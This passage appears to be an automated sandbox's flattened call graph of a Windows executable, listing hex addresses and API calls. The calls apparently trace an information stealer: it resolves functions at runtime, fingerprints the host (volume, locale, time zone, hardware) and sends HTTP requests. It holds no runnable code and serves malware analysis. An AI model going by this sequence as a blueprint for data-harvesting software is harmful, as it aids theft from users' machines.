12431f 14214->14215 14216 1245c0 2 API calls 14215->14216 14217 124338 14216->14217 14218 1245c0 2 API calls 14217->14218 14219 124351 14218->14219 14220 1245c0 2 API calls 14219->14220 14221 12436a 14220->14221 14222 1245c0 2 API calls 14221->14222 14223 124383 14222->14223 14224 1245c0 2 API calls 14223->14224 14225 12439c 14224->14225 14226 1245c0 2 API calls 14225->14226 14227 1243b5 14226->14227 14228 1245c0 2 API calls 14227->14228 14229 1243ce 14228->14229 14230 1245c0 2 API calls 14229->14230 14231 1243e7 14230->14231 14232 1245c0 2 API calls 14231->14232 14233 124400 14232->14233 14234 1245c0 2 API calls 14233->14234 14235 124419 14234->14235 14236 1245c0 2 API calls 14235->14236 14237 124432 14236->14237 14238 1245c0 2 API calls 14237->14238 14239 12444b 14238->14239 14240 1245c0 2 API calls 14239->14240 14241 124464 14240->14241 14242 1245c0 2 API calls 14241->14242 14243 12447d 14242->14243 14244 1245c0 2 API calls 14243->14244 14245 124496 14244->14245 14246 1245c0 2 API calls 14245->14246 14247 1244af 14246->14247 14248 1245c0 2 API calls 14247->14248 14249 1244c8 14248->14249 14250 1245c0 2 API calls 14249->14250 14251 1244e1 14250->14251 14252 1245c0 2 API calls 14251->14252 14253 1244fa 14252->14253 14254 1245c0 2 API calls 14253->14254 14255 124513 14254->14255 14256 1245c0 2 API calls 14255->14256 14257 12452c 14256->14257 14258 1245c0 2 API calls 14257->14258 14259 124545 14258->14259 14260 1245c0 2 API calls 14259->14260 14261 12455e 14260->14261 14262 1245c0 2 API calls 14261->14262 14263 124577 14262->14263 14264 1245c0 2 API calls 14263->14264 14265 124590 14264->14265 14266 1245c0 2 API calls 14265->14266 14267 1245a9 14266->14267 14268 139c10 14267->14268 14269 139c20 43 API calls 14268->14269 14270 13a036 8 API calls 14268->14270 14269->14270 14271 13a146 14270->14271 14272 13a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14270->14272 14273 13a153 8 API calls 14271->14273 14274 13a216 14271->14274 14272->14271 14273->14274 14275 13a298 14274->14275 14276 13a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14274->14276 14277 13a337 14275->14277 14278 13a2a5 6 API calls 14275->14278 14276->14275 14279 13a344 9 API calls 14277->14279 14280 13a41f 14277->14280 14278->14277 14279->14280 14281 13a4a2 14280->14281 14282 13a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14280->14282 14283 13a4ab GetProcAddress GetProcAddress 14281->14283 14284 13a4dc 14281->14284 14282->14281 14283->14284 14285 13a515 14284->14285 14286 13a4e5 GetProcAddress GetProcAddress 14284->14286 14287 13a612 14285->14287 14288 13a522 10 API calls 14285->14288 14286->14285 14289 13a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14287->14289 14290 13a67d 14287->14290 14288->14287 14289->14290 14291 13a686 GetProcAddress 14290->14291 14292 13a69e 14290->14292 14291->14292 14293 13a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14292->14293 14294 135ca3 14292->14294 14293->14294 14295 121590 14294->14295 15414 121670 14295->15414 14298 13a7a0 lstrcpy 14299 1215b5 14298->14299 14300 13a7a0 lstrcpy 14299->14300 14301 1215c7 14300->14301 14302 13a7a0 lstrcpy 14301->14302 14303 1215d9 14302->14303 14304 13a7a0 lstrcpy 14303->14304 14305 121663 14304->14305 14306 135510 14305->14306 14307 135521 14306->14307 14308 13a820 2 API calls 14307->14308 14309 13552e 14308->14309 14310 13a820 2 API calls 14309->14310 14311 13553b 14310->14311 14312 13a820 2 API calls 14311->14312 14313 135548 14312->14313 14314 13a740 lstrcpy 14313->14314 14315 135555 14314->14315 14316 13a740 lstrcpy 14315->14316 14317 135562 14316->14317 14318 13a740 lstrcpy 14317->14318 14319 13556f 14318->14319 14320 13a740 lstrcpy 14319->14320 14332 13557c 14320->14332 14321 13a8a0 lstrcpy 14321->14332 14322 135643 StrCmpCA 14322->14332 14323 1356a0 StrCmpCA 14324 1357dc 14323->14324 14323->14332 14326 13a8a0 lstrcpy 14324->14326 14325 13a7a0 lstrcpy 14325->14332 14327 1357e8 14326->14327 14328 13a820 2 API calls 14327->14328 14330 1357f6 14328->14330 14329 1351f0 20 API calls 14329->14332 14333 13a820 2 API calls 14330->14333 14331 135856 StrCmpCA 14331->14332 14334 135991 14331->14334 14332->14321 14332->14322 14332->14323 14332->14325 14332->14329 14332->14331 14337 121590 lstrcpy 14332->14337 14341 13a740 lstrcpy 14332->14341 14342 13a820 lstrlen lstrcpy 14332->14342 14343 1352c0 25 API calls 14332->14343 14345 135a0b StrCmpCA 14332->14345 14357 13578a StrCmpCA 14332->14357 14359 13593f StrCmpCA 14332->14359 14336 135805 14333->14336 14335 13a8a0 lstrcpy 14334->14335 14338 13599d 14335->14338 14339 121670 lstrcpy 14336->14339 14337->14332 14340 13a820 2 API calls 14338->14340 14360 135811 14339->14360 14344 1359ab 14340->14344 14341->14332 14342->14332 14343->14332 14346 13a820 2 API calls 14344->14346 14347 135a16 Sleep 14345->14347 14348 135a28 14345->14348 14349 1359ba 14346->14349 14347->14332 14350 13a8a0 lstrcpy 14348->14350 14352 121670 lstrcpy 14349->14352 14351 135a34 14350->14351 14353 13a820 2 API calls 14351->14353 14352->14360 14354 135a43 14353->14354 14355 13a820 2 API calls 14354->14355 14356 135a52 14355->14356 14358 121670 lstrcpy 14356->14358 14357->14332 14358->14360 14359->14332 14360->13413 14362 137553 GetVolumeInformationA 14361->14362 14363 13754c 14361->14363 14364 137591 14362->14364 14363->14362 14365 1375fc GetProcessHeap RtlAllocateHeap 14364->14365 14366 137619 14365->14366 14367 137628 wsprintfA 14365->14367 14368 13a740 lstrcpy 14366->14368 14369 13a740 lstrcpy 14367->14369 14370 135da7 14368->14370 14369->14370 14370->13434 14372 13a7a0 lstrcpy 14371->14372 14373 124899 14372->14373 15423 1247b0 14373->15423 14375 1248a5 14376 13a740 lstrcpy 14375->14376 14377 1248d7 14376->14377 14378 13a740 lstrcpy 14377->14378 14379 1248e4 14378->14379 14380 13a740 lstrcpy 14379->14380 14381 1248f1 14380->14381 14382 13a740 lstrcpy 14381->14382 14383 1248fe 14382->14383 14384 13a740 lstrcpy 14383->14384 14385 12490b InternetOpenA StrCmpCA 14384->14385 14386 124944 14385->14386 14387 124ecb InternetCloseHandle 14386->14387 15429 138b60 14386->15429 14389 124ee8 14387->14389 15445 129ac0 CryptStringToBinaryA 14389->15445 14390 124963 15437 13a920 14390->15437 14394 124976 14395 13a8a0 lstrcpy 14394->14395 14400 12497f 14395->14400 14396 13a820 2 API calls 14397 124f05 14396->14397 14398 13a9b0 4 API calls 14397->14398 14401 124f1b 14398->14401 14399 124f27 ctype 14402 13a7a0 lstrcpy 14399->14402 14404 13a9b0 4 API calls 14400->14404 14403 13a8a0 lstrcpy 14401->14403 14415 124f57 14402->14415 14403->14399 14405 1249a9 14404->14405 14406 13a8a0 lstrcpy 14405->14406 14407 1249b2 14406->14407 14408 13a9b0 4 API calls 14407->14408 14409 1249d1 14408->14409 14410 13a8a0 lstrcpy 14409->14410 14411 1249da 14410->14411 14412 13a920 3 API calls 14411->14412 14413 1249f8 14412->14413 14414 13a8a0 lstrcpy 14413->14414 14416 124a01 14414->14416 14415->13437 14417 13a9b0 4 API calls 14416->14417 14418 124a20 14417->14418 14419 13a8a0 lstrcpy 14418->14419 14420 124a29 14419->14420 14421 13a9b0 4 API calls 14420->14421 14422 124a48 14421->14422 14423 13a8a0 lstrcpy 14422->14423 14424 124a51 14423->14424 14425 13a9b0 4 API calls 14424->14425 14426 124a7d 14425->14426 14427 13a920 3 API calls 14426->14427 14428 124a84 14427->14428 14429 13a8a0 lstrcpy 14428->14429 14430 124a8d 14429->14430 14431 124aa3 InternetConnectA 14430->14431 14431->14387 14432 124ad3 HttpOpenRequestA 14431->14432 14434 124b28 14432->14434 14435 124ebe InternetCloseHandle 14432->14435 14436 13a9b0 4 API calls 14434->14436 14435->14387 14437 124b3c 14436->14437 14438 13a8a0 lstrcpy 14437->14438 14439 124b45 14438->14439 14440 13a920 3 API calls 14439->14440 14441 124b63 14440->14441 14442 13a8a0 lstrcpy 14441->14442 14443 124b6c 14442->14443 14444 13a9b0 4 API calls 14443->14444 14445 124b8b 14444->14445 14446 13a8a0 lstrcpy 14445->14446 14447 124b94 14446->14447 14448 13a9b0 4 API calls 14447->14448 14449 124bb5 14448->14449 14450 13a8a0 lstrcpy 14449->14450 14451 124bbe 14450->14451 14452 13a9b0 4 API calls 14451->14452 14453 124bde 14452->14453 14454 13a8a0 lstrcpy 14453->14454 14455 124be7 14454->14455 14456 13a9b0 4 API calls 14455->14456 14457 124c06 14456->14457 14458 13a8a0 lstrcpy 14457->14458 14459 124c0f 14458->14459 14460 13a920 3 API calls 14459->14460 14461 124c2d 14460->14461 14462 13a8a0 lstrcpy 14461->14462 14463 124c36 14462->14463 14464 13a9b0 4 API calls 14463->14464 14465 124c55 14464->14465 14466 13a8a0 lstrcpy 14465->14466 14467 124c5e 14466->14467 14468 13a9b0 4 API calls 14467->14468 14469 124c7d 14468->14469 14470 13a8a0 lstrcpy 14469->14470 14471 124c86 14470->14471 14472 13a920 3 API calls 14471->14472 14473 124ca4 14472->14473 14474 13a8a0 lstrcpy 14473->14474 14475 124cad 14474->14475 14476 13a9b0 4 API calls 14475->14476 14477 124ccc 14476->14477 14478 13a8a0 lstrcpy 14477->14478 14479 124cd5 14478->14479 14480 13a9b0 4 API calls 14479->14480 14481 124cf6 14480->14481 14482 13a8a0 lstrcpy 14481->14482 14483 124cff 14482->14483 14484 13a9b0 4 API calls 14483->14484 14485 124d1f 14484->14485 14486 13a8a0 lstrcpy 14485->14486 14487 124d28 14486->14487 14488 13a9b0 4 API calls 14487->14488 14489 124d47 14488->14489 14490 13a8a0 lstrcpy 14489->14490 14491 124d50 14490->14491 14492 13a920 3 API calls 14491->14492 14493 124d6e 14492->14493 14494 13a8a0 lstrcpy 14493->14494 14495 124d77 14494->14495 14496 13a740 lstrcpy 14495->14496 14497 124d92 14496->14497 14498 13a920 3 API calls 14497->14498 14499 124db3 14498->14499 14500 13a920 3 API calls 14499->14500 14501 124dba 14500->14501 14502 13a8a0 lstrcpy 14501->14502 14503 124dc6 14502->14503 14504 124de7 lstrlen 14503->14504 14505 124dfa 14504->14505 14506 124e03 lstrlen 14505->14506 15443 13aad0 14506->15443 14509 124e32 InternetReadFile 14510 124e67 InternetCloseHandle 14509->14510 14515 124e5e 14509->14515 14513 13a800 14510->14513 14512 13a9b0 4 API calls 14512->14515 14513->14435 14514 13a8a0 lstrcpy 14514->14515 14515->14509 14515->14510 14515->14512 14515->14514 14517 13aad0 14516->14517 14518 1317c4 StrCmpCA 14517->14518 14519 1317cf ExitProcess 14518->14519 14530 1317d7 14518->14530 14520 1319c2 14520->13439 14521 131913 StrCmpCA 14521->14530 14522 131932 StrCmpCA 14522->14530 14523 1318f1 StrCmpCA 14523->14530 14524 131951 StrCmpCA 14524->14530 14525 131970 StrCmpCA 14525->14530 14526 13187f StrCmpCA 14526->14530 14527 13185d StrCmpCA 14527->14530 14528 1318cf StrCmpCA 14528->14530 14529 1318ad StrCmpCA 14529->14530 14530->14520 14530->14521 14530->14522 14530->14523 14530->14524 14530->14525 14530->14526 14530->14527 14530->14528 14530->14529 14531 13a820 lstrlen lstrcpy 14530->14531 14531->14530 14533 13a7a0 lstrcpy 14532->14533 14534 125979 14533->14534 14535 1247b0 2 API calls 14534->14535 14536 125985 14535->14536 14537 13a740 lstrcpy 14536->14537 14538 1259ba 14537->14538 14539 13a740 lstrcpy 14538->14539 14540 1259c7 14539->14540 14541 13a740 lstrcpy 14540->14541 14542 1259d4 14541->14542 14543 13a740 lstrcpy 14542->14543 14544 1259e1 14543->14544 14545 13a740 lstrcpy 14544->14545 14546 1259ee InternetOpenA StrCmpCA 14545->14546 14547 125a1d 14546->14547 14548 125fc3 InternetCloseHandle 14547->14548 14549 138b60 3 API calls 14547->14549 14550 125fe0 14548->14550 14551 125a3c 14549->14551 14553 129ac0 4 API calls 14550->14553 14552 13a920 3 API calls 14551->14552 14554 125a4f 14552->14554 14555 125fe6 14553->14555 14556 13a8a0 lstrcpy 14554->14556 14557 13a820 2 API calls 14555->14557 14560 12601f ctype 14555->14560 14562 125a58 14556->14562 14558 125ffd 14557->14558 14559 13a9b0 4 API calls 14558->14559 14561 126013 14559->14561 14564 13a7a0 lstrcpy 14560->14564 14563 13a8a0 lstrcpy 14561->14563 14565 13a9b0 4 API calls 14562->14565 14563->14560 14573 12604f 14564->14573 14566 125a82 14565->14566 14567 13a8a0 lstrcpy 14566->14567 14568 125a8b 14567->14568 14569 13a9b0 4 API calls 14568->14569 14570 125aaa 14569->14570 14571 13a8a0 lstrcpy 14570->14571 14572 125ab3 14571->14572 14574 13a920 3 API calls 14572->14574 14573->13445 14575 125ad1 14574->14575 14576 13a8a0 lstrcpy 14575->14576 14577 125ada 14576->14577 14578 13a9b0 4 API calls 14577->14578 14579 125af9 14578->14579 14580 13a8a0 lstrcpy 14579->14580 14581 125b02 14580->14581 14582 13a9b0 4 API calls 14581->14582 14583 125b21 14582->14583 14584 13a8a0 lstrcpy 14583->14584 14585 125b2a 14584->14585 14586 13a9b0 4 API calls 14585->14586 14587 125b56 14586->14587 14588 13a920 3 API calls 14587->14588 14589 125b5d 14588->14589 14590 13a8a0 lstrcpy 14589->14590 14591 125b66 14590->14591 14592 125b7c InternetConnectA 14591->14592 14592->14548 14593 125bac HttpOpenRequestA 14592->14593 14595 125fb6 InternetCloseHandle 14593->14595 14596 125c0b 14593->14596 14595->14548 14597 13a9b0 4 API calls 14596->14597 14598 125c1f 14597->14598 14599 13a8a0 lstrcpy 14598->14599 14600 125c28 14599->14600 14601 13a920 3 API calls 14600->14601 14602 125c46 14601->14602 14603 13a8a0 lstrcpy 14602->14603 14604 125c4f 14603->14604 14605 13a9b0 4 API calls 14604->14605 14606 125c6e 14605->14606 14607 13a8a0 lstrcpy 14606->14607 14608 125c77 14607->14608 14609 13a9b0 4 API calls 14608->14609 14610 125c98 14609->14610 14611 13a8a0 lstrcpy 14610->14611 14612 125ca1 14611->14612 14613 13a9b0 4 API calls 14612->14613 14614 125cc1 14613->14614 14615 13a8a0 lstrcpy 14614->14615 14616 125cca 14615->14616 14617 13a9b0 4 API calls 14616->14617 14618 125ce9 14617->14618 14619 13a8a0 lstrcpy 14618->14619 14620 125cf2 14619->14620 14621 13a920 3 API calls 14620->14621 14622 125d10 14621->14622 14623 13a8a0 lstrcpy 14622->14623 14624 125d19 14623->14624 14625 13a9b0 4 API calls 14624->14625 14626 125d38 14625->14626 14627 13a8a0 lstrcpy 14626->14627 14628 125d41 14627->14628 14629 13a9b0 4 API calls 14628->14629 14630 125d60 14629->14630 14631 13a8a0 lstrcpy 14630->14631 14632 125d69 14631->14632 14633 13a920 3 API calls 14632->14633 14634 125d87 14633->14634 14635 13a8a0 lstrcpy 14634->14635 14636 125d90 14635->14636 14637 13a9b0 4 API calls 14636->14637 14638 125daf 14637->14638 14639 13a8a0 lstrcpy 14638->14639 14640 125db8 14639->14640 14641 13a9b0 4 API calls 14640->14641 14642 125dd9 14641->14642 14643 13a8a0 lstrcpy 14642->14643 14644 125de2 14643->14644 14645 13a9b0 4 API calls 14644->14645 14646 125e02 14645->14646 14647 13a8a0 lstrcpy 14646->14647 14648 125e0b 14647->14648 14649 13a9b0 4 API calls 14648->14649 14650 125e2a 14649->14650 14651 13a8a0 lstrcpy 14650->14651 14652 125e33 14651->14652 14653 13a920 3 API calls 14652->14653 14654 125e54 14653->14654 14655 13a8a0 lstrcpy 14654->14655 14656 125e5d 14655->14656 14657 125e70 lstrlen 14656->14657 14658 13aad0 14657->14658 14659 125e81 lstrlen GetProcessHeap RtlAllocateHeap 14658->14659 14660 13aad0 14659->14660 14661 125eae lstrlen 14660->14661 14662 125ebe 14661->14662 14663 125ed7 lstrlen 14662->14663 14664 125ee7 14663->14664 14665 125ef0 lstrlen 14664->14665 14666 125f04 14665->14666 14667 125f1a lstrlen 14666->14667 14668 13aad0 14667->14668 14669 125f2a HttpSendRequestA 14668->14669 14670 125f35 InternetReadFile 14669->14670 14671 125f6a InternetCloseHandle 14670->14671 14675 125f61 14670->14675 14671->14595 14673 13a9b0 4 API calls 14673->14675 14674 13a8a0 lstrcpy 14674->14675 14675->14670 14675->14671 14675->14673 14675->14674 14679 131077 14676->14679 14677 131151 14677->13447 14678 13a820 lstrlen lstrcpy 14678->14679 14679->14677 14679->14678 14681 130db7 14680->14681 14682 130f17 14681->14682 14683 130e27 StrCmpCA 14681->14683 14684 130e67 StrCmpCA 14681->14684 14685 130ea4 StrCmpCA 14681->14685 14686 13a820 lstrlen lstrcpy 14681->14686 14682->13455 14683->14681 14684->14681 14685->14681 14686->14681 14688 130f67 14687->14688 14689 130fb2 StrCmpCA 14688->14689 14690 131044 14688->14690 14691 13a820 lstrlen lstrcpy 14688->14691 14689->14688 14690->13463 14691->14688 14693 13a740 lstrcpy 14692->14693 14694 131a26 14693->14694 14695 13a9b0 4 API calls 14694->14695 14696 131a37 14695->14696 14697 13a8a0 lstrcpy 14696->14697 14698 131a40 14697->14698 14699 13a9b0 4 API calls 14698->14699 14700 131a5b 14699->14700 14701 13a8a0 lstrcpy 14700->14701 14702 131a64 14701->14702 14703 13a9b0 4 API calls 14702->14703 14704 131a7d 14703->14704 14705 13a8a0 lstrcpy 14704->14705 14706 131a86 14705->14706 14707 13a9b0 4 API calls 14706->14707 14708 131aa1 14707->14708 14709 13a8a0 lstrcpy 14708->14709 14710 131aaa 14709->14710 14711 13a9b0 4 API calls 14710->14711 14712 131ac3 14711->14712 14713 13a8a0 lstrcpy 14712->14713 14714 131acc 14713->14714 14715 13a9b0 4 API calls 14714->14715 14716 131ae7 14715->14716 14717 13a8a0 lstrcpy 14716->14717 14718 131af0 14717->14718 14719 13a9b0 4 API calls 14718->14719 14720 131b09 14719->14720 14721 13a8a0 lstrcpy 14720->14721 14722 131b12 14721->14722 14723 13a9b0 4 API calls 14722->14723 14724 131b2d 14723->14724 14725 13a8a0 lstrcpy 14724->14725 14726 131b36 14725->14726 14727 13a9b0 4 API calls 14726->14727 14728 131b4f 14727->14728 14729 13a8a0 lstrcpy 14728->14729 14730 131b58 14729->14730 14731 13a9b0 4 API calls 14730->14731 14732 131b76 14731->14732 14733 13a8a0 lstrcpy 14732->14733 14734 131b7f 14733->14734 14735 137500 6 API calls 14734->14735 14736 131b96 14735->14736 14737 13a920 3 API calls 14736->14737 14738 131ba9 14737->14738 14739 13a8a0 lstrcpy 14738->14739 14740 131bb2 14739->14740 14741 13a9b0 4 API calls 14740->14741 14742 131bdc 14741->14742 14743 13a8a0 lstrcpy 14742->14743 14744 131be5 14743->14744 14745 13a9b0 4 API calls 14744->14745 14746 131c05 14745->14746 14747 13a8a0 lstrcpy 14746->14747 14748 131c0e 14747->14748 15450 137690 GetProcessHeap RtlAllocateHeap 14748->15450 14751 13a9b0 4 API calls 14752 131c2e 14751->14752 14753 13a8a0 lstrcpy 14752->14753 14754 131c37 14753->14754 14755 13a9b0 4 API calls 14754->14755 14756 131c56 14755->14756 14757 13a8a0 lstrcpy 14756->14757 14758 131c5f 14757->14758 14759 13a9b0 4 API calls 14758->14759 14760 131c80 14759->14760 14761 13a8a0 lstrcpy 14760->14761 14762 131c89 14761->14762 15457 1377c0 GetCurrentProcess IsWow64Process 14762->15457 14765 13a9b0 4 API calls 14766 131ca9 14765->14766 14767 13a8a0 lstrcpy 14766->14767 14768 131cb2 14767->14768 14769 13a9b0 4 API calls 14768->14769 14770 131cd1 14769->14770 14771 13a8a0 lstrcpy 14770->14771 14772 131cda 14771->14772 14773 13a9b0 4 API calls 14772->14773 14774 131cfb 14773->14774 14775 13a8a0 lstrcpy 14774->14775 14776 131d04 14775->14776 14777 137850 3 API calls 14776->14777 14778 131d14 14777->14778 14779 13a9b0 4 API calls 14778->14779 14780 131d24 14779->14780 14781 13a8a0 lstrcpy 14780->14781 14782 131d2d 14781->14782 14783 13a9b0 4 API calls 14782->14783 14784 131d4c 14783->14784 14785 13a8a0 lstrcpy 14784->14785 14786 131d55 14785->14786 14787 13a9b0 4 API calls 14786->14787 14788 131d75 14787->14788 14789 13a8a0 lstrcpy 14788->14789 14790 131d7e 14789->14790 14791 1378e0 3 API calls 14790->14791 14792 131d8e 14791->14792 14793 13a9b0 4 API calls 14792->14793 14794 131d9e 14793->14794 14795 13a8a0 lstrcpy 14794->14795 14796 131da7 14795->14796 14797 13a9b0 4 API calls 14796->14797 14798 131dc6 14797->14798 14799 13a8a0 lstrcpy 14798->14799 14800 131dcf 14799->14800 14801 13a9b0 4 API calls 14800->14801 14802 131df0 14801->14802 14803 13a8a0 lstrcpy 14802->14803 14804 131df9 14803->14804 15459 137980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14804->15459 14807 13a9b0 4 API calls 14808 131e19 14807->14808 14809 13a8a0 lstrcpy 14808->14809 14810 131e22 14809->14810 14811 13a9b0 4 API calls 14810->14811 14812 131e41 14811->14812 14813 13a8a0 lstrcpy 14812->14813 14814 131e4a 14813->14814 14815 13a9b0 4 API calls 14814->14815 14816 131e6b 14815->14816 14817 13a8a0 lstrcpy 14816->14817 14818 131e74 14817->14818 15461 137a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14818->15461 14821 13a9b0 4 API calls 14822 131e94 14821->14822 14823 13a8a0 lstrcpy 14822->14823 14824 131e9d 14823->14824 14825 13a9b0 4 API calls 14824->14825 14826 131ebc 14825->14826 14827 13a8a0 lstrcpy 14826->14827 14828 131ec5 14827->14828 14829 13a9b0 4 API calls 14828->14829 14830 131ee5 14829->14830 14831 13a8a0 lstrcpy 14830->14831 14832 131eee 14831->14832 15464 137b00 GetUserDefaultLocaleName 14832->15464 14835 13a9b0 4 API calls 14836 131f0e 14835->14836 14837 13a8a0 lstrcpy 14836->14837 14838 131f17 14837->14838 14839 13a9b0 4 API calls 14838->14839 14840 131f36 14839->14840 14841 13a8a0 lstrcpy 14840->14841 14842 131f3f 14841->14842 14843 13a9b0 4 API calls 14842->14843 14844 131f60 14843->14844 14845 13a8a0 lstrcpy 14844->14845 14846 131f69 14845->14846 15468 137b90 14846->15468 14848 131f80 14849 13a920 3 API calls 14848->14849 14850 131f93 14849->14850 14851 13a8a0 lstrcpy 14850->14851 14852 131f9c 14851->14852 14853 13a9b0 4 API calls 14852->14853 14854 131fc6 14853->14854 14855 13a8a0 lstrcpy 14854->14855 14856 131fcf 14855->14856 14857 13a9b0 4 API calls 14856->14857 14858 131fef 14857->14858 14859 13a8a0 lstrcpy 14858->14859 14860 131ff8 14859->14860 15480 137d80 GetSystemPowerStatus 14860->15480 14863 13a9b0 4 API calls 14864 132018 14863->14864 14865 13a8a0 lstrcpy 14864->14865 14866 132021 14865->14866 14867 13a9b0 4 API calls 14866->14867 14868 132040 14867->14868 14869 13a8a0 lstrcpy 14868->14869 14870 132049 14869->14870 14871 13a9b0 4 API calls 14870->14871 14872 13206a 14871->14872 14873 13a8a0 lstrcpy 14872->14873 14874 132073 14873->14874 14875 13207e GetCurrentProcessId 14874->14875 15482 139470 OpenProcess 14875->15482 14878 13a920 3 API calls 14879 1320a4 14878->14879 14880 13a8a0 lstrcpy 14879->14880 14881 1320ad 14880->14881 14882 13a9b0 4 API calls 14881->14882 14883 1320d7 14882->14883 14884 13a8a0 lstrcpy 14883->14884 14885 1320e0 14884->14885 14886 13a9b0 4 API calls 14885->14886 14887 132100 14886->14887 14888 13a8a0 lstrcpy 14887->14888 14889 132109 14888->14889 15487 137e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14889->15487 14892 13a9b0 4 API calls 14893 132129 14892->14893 14894 13a8a0 lstrcpy 14893->14894 14895 132132 14894->14895 14896 13a9b0 4 API calls 14895->14896 14897 132151 14896->14897 14898 13a8a0 lstrcpy 14897->14898 14899 13215a 14898->14899 14900 13a9b0 4 API calls 14899->14900 14901 13217b 14900->14901 14902 13a8a0 lstrcpy 14901->14902 14903 132184 14902->14903 15491 137f60 14903->15491 14906 13a9b0 4 API calls 14907 1321a4 14906->14907 14908 13a8a0 lstrcpy 14907->14908 14909 1321ad 14908->14909 14910 13a9b0 4 API calls 14909->14910 14911 1321cc 14910->14911 14912 13a8a0 lstrcpy 14911->14912 14913 1321d5 14912->14913 14914 13a9b0 4 API calls 14913->14914 14915 1321f6 14914->14915 14916 13a8a0 lstrcpy 14915->14916 14917 1321ff 14916->14917 15504 137ed0 GetSystemInfo wsprintfA 14917->15504 14920 13a9b0 4 API calls 14921 13221f 14920->14921 14922 13a8a0 lstrcpy 14921->14922 14923 132228 14922->14923 14924 13a9b0 4 API calls 14923->14924 14925 132247 14924->14925 14926 13a8a0 lstrcpy 14925->14926 14927 132250 14926->14927 14928 13a9b0 4 API calls 14927->14928 14929 132270 14928->14929 14930 13a8a0 lstrcpy 14929->14930 14931 132279 14930->14931 15506 138100 GetProcessHeap RtlAllocateHeap 14931->15506 14934 13a9b0 4 API calls 14935 132299 14934->14935 14936 13a8a0 lstrcpy 14935->14936 14937 1322a2 14936->14937 14938 13a9b0 4 API calls 14937->14938 14939 1322c1 14938->14939 14940 13a8a0 lstrcpy 14939->14940 14941 1322ca 14940->14941 14942 13a9b0 4 API calls 14941->14942 14943 1322eb 14942->14943 14944 13a8a0 lstrcpy 14943->14944 14945 1322f4 14944->14945 15512 1387c0 14945->15512 14948 13a920 3 API calls 14949 13231e 14948->14949 14950 13a8a0 lstrcpy 14949->14950 14951 132327 14950->14951 14952 13a9b0 4 API calls 14951->14952 14953 132351 14952->14953 14954 13a8a0 lstrcpy 14953->14954 14955 13235a 14954->14955 14956 13a9b0 4 API calls 14955->14956 14957 13237a 14956->14957 14958 13a8a0 lstrcpy 14957->14958 14959 132383 14958->14959 14960 13a9b0 4 API calls 14959->14960 14961 1323a2 14960->14961 14962 13a8a0 lstrcpy 14961->14962 14963 1323ab 14962->14963 15517 1381f0 14963->15517 14965 1323c2 14966 13a920 3 API calls 14965->14966 14967 1323d5 14966->14967 14968 13a8a0 lstrcpy 14967->14968 14969 1323de 14968->14969 14970 13a9b0 4 API calls 14969->14970 14971 13240a 14970->14971 14972 13a8a0 lstrcpy 14971->14972 14973 132413 14972->14973 14974 13a9b0 4 API calls 14973->14974 14975 132432 14974->14975 14976 13a8a0 lstrcpy 14975->14976 14977 13243b 14976->14977 14978 13a9b0 4 API calls 14977->14978 14979 13245c 14978->14979 14980 13a8a0 lstrcpy 14979->14980 14981 132465 14980->14981 14982 13a9b0 4 API calls 14981->14982 14983 132484 14982->14983 14984 13a8a0 lstrcpy 14983->14984 14985 13248d 14984->14985 14986 13a9b0 4 API calls 14985->14986 14987 1324ae 14986->14987 14988 13a8a0 lstrcpy 14987->14988 14989 1324b7 14988->14989 15525 138320 14989->15525 14991 1324d3 14992 13a920 3 API calls 14991->14992 14993 1324e6 14992->14993 14994 13a8a0 lstrcpy 14993->14994 14995 1324ef 14994->14995 14996 13a9b0 4 API calls 14995->14996 14997 132519 14996->14997 14998 13a8a0 lstrcpy 14997->14998 14999 132522 14998->14999 15000 13a9b0 4 API calls 14999->15000 15001 132543 15000->15001 15002 13a8a0 lstrcpy 15001->15002 15003 13254c 15002->15003 15004 138320 17 API calls 15003->15004 15005 132568 15004->15005 15006 13a920 3 API calls 15005->15006 15007 13257b 15006->15007 15008 13a8a0 lstrcpy 15007->15008 15009 132584 15008->15009 15010 13a9b0 4 API calls 15009->15010 15011 1325ae 15010->15011 15012 13a8a0 lstrcpy 15011->15012 15013 1325b7 15012->15013 15014 13a9b0 4 API calls 15013->15014 15015 1325d6 15014->15015 15016 13a8a0 lstrcpy 15015->15016 15017 1325df 15016->15017 15018 13a9b0 4 API calls 15017->15018 15019 132600 15018->15019 15020 13a8a0 lstrcpy 15019->15020 15021 132609 15020->15021 15561 138680 15021->15561 15023 132620 15024 13a920 3 API calls 15023->15024 15025 132633 15024->15025 15026 13a8a0 lstrcpy 15025->15026 15027 13263c 15026->15027 15028 13265a lstrlen 15027->15028 15029 13266a 15028->15029 15030 13a740 lstrcpy 15029->15030 15031 13267c 15030->15031 15032 121590 lstrcpy 15031->15032 15033 13268d 15032->15033 15571 135190 15033->15571 15035 132699 15035->13467 15037 13aad0 15036->15037 15038 125009 InternetOpenUrlA 15037->15038 15042 125021 15038->15042 15039 1250a0 InternetCloseHandle InternetCloseHandle 15041 1250ec 15039->15041 15040 12502a InternetReadFile 15040->15042 15041->13471 15042->15039 15042->15040 15756 1298d0 15043->15756 15045 130759 15046 130a38 15045->15046 15047 13077d 15045->15047 15048 121590 lstrcpy 15046->15048 15050 130799 StrCmpCA 15047->15050 15049 130a49 15048->15049 15932 130250 15049->15932 15051 1307a8 15050->15051 15079 130843 15050->15079 15053 13a7a0 lstrcpy 15051->15053 15054 1307c3 15053->15054 15056 121590 lstrcpy 15054->15056 15055 130865 StrCmpCA 15057 130874 15055->15057 15095 13096b 15055->15095 15059 13080c 15056->15059 15060 13a740 lstrcpy 15057->15060 15062 13a7a0 lstrcpy 15059->15062 15061 130881 15060->15061 15064 13a9b0 4 API calls 15061->15064 15065 130823 15062->15065 15063 13099c StrCmpCA 15066 130a2d 15063->15066 15067 1309ab 15063->15067 15069 1308ac 15064->15069 15070 13a7a0 lstrcpy 15065->15070 15066->13475 15068 121590 lstrcpy 15067->15068 15071 1309f4 15068->15071 15072 13a920 3 API calls 15069->15072 15073 13083e 15070->15073 15074 13a7a0 lstrcpy 15071->15074 15075 1308b3 15072->15075 15759 12fb00 15073->15759 15077 130a0d 15074->15077 15078 13a9b0 4 API calls 15075->15078 15080 13a7a0 lstrcpy 